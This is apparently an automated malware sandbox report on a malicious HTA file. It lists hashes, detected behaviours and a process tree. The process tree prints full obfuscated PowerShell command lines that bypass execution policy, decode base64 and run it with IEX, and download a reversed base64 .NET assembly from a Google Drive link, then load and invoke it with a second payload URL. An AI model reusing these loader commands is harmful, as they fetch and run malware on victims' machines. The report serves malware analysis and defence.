Analysis
- max time kernel: 119s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 23-10-2024 06:01
Static task: static1
Behavioral task: behavioral1
- Sample: greatwayforbestthignswithwhonotwanttodo.hta
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: greatwayforbestthignswithwhonotwanttodo.hta
- Resource: win10v2004-20241007-en
General
- Target: greatwayforbestthignswithwhonotwanttodo.hta
- Size: 130KB
- MD5: 67a5ad5e7caf5c79cb209e433c345c0b
- SHA1: 15776cf58dee4ecb7b42b2836539d8d553bf5439
- SHA256: 5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4
- SHA512: b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96
- SSDEEP: 192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22
Malware Config
Extracted
- https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures

Blocklisted process makes network request (3 IoCs)
- flow 4, pid 2640, powERShEll.EXe
- flow 6, pid 1164, powershell.exe
- flow 8, pid 1164, powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run PowerShell and hide display window.
- pid 2512, powershell.exe
- pid 1164, powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
- pid 2640, powERShEll.EXe
- pid 2796, powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- flow 5, ioc drive.google.com
- flow 6, ioc drive.google.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by cvtres.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by WScript.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by powershell.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by powershell.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by mshta.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by powERShEll.EXe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by powershell.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by csc.exe

Modifies Internet Explorer settings
- Key created: \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main, by mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
- pid 2640, powERShEll.EXe
- pid 2796, powershell.exe
- pid 2640, powERShEll.EXe
- pid 2640, powERShEll.EXe
- pid 2512, powershell.exe
- pid 1164, powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
- Token: SeDebugPrivilege, pid 2640, powERShEll.EXe
- Token: SeDebugPrivilege, pid 2796, powershell.exe
- Token: SeDebugPrivilege, pid 2512, powershell.exe
- Token: SeDebugPrivilege, pid 1164, powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs; each of the following events was recorded 4 times)
- PID 1504 (mshta.exe) wrote to memory of 2640, procid_target 30
- PID 2640 (powERShEll.EXe) wrote to memory of 2796, procid_target 32
- PID 2640 (powERShEll.EXe) wrote to memory of 2844, procid_target 33
- PID 2844 (csc.exe) wrote to memory of 2980, procid_target 34
- PID 2640 (powERShEll.EXe) wrote to memory of 2752, procid_target 36
- PID 2752 (WScript.exe) wrote to memory of 2512, procid_target 37
- PID 2512 (powershell.exe) wrote to memory of 1164, procid_target 39
Processes

- C:\Windows\SysWOW64\mshta.exe (PID 1504)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta"
  Signatures:
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe (PID 2640)
    Command line: "C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'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'+[cHar]34+'))')))"
    Signatures:
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2796)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent
      Signatures:
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 2844)
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline"
      Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 2980)
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp"
        Signatures:
        - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\WScript.exe (PID 2752)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"
      Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2512)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Signatures:
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1164)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"
          Signatures:
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (Filesize: 7KB)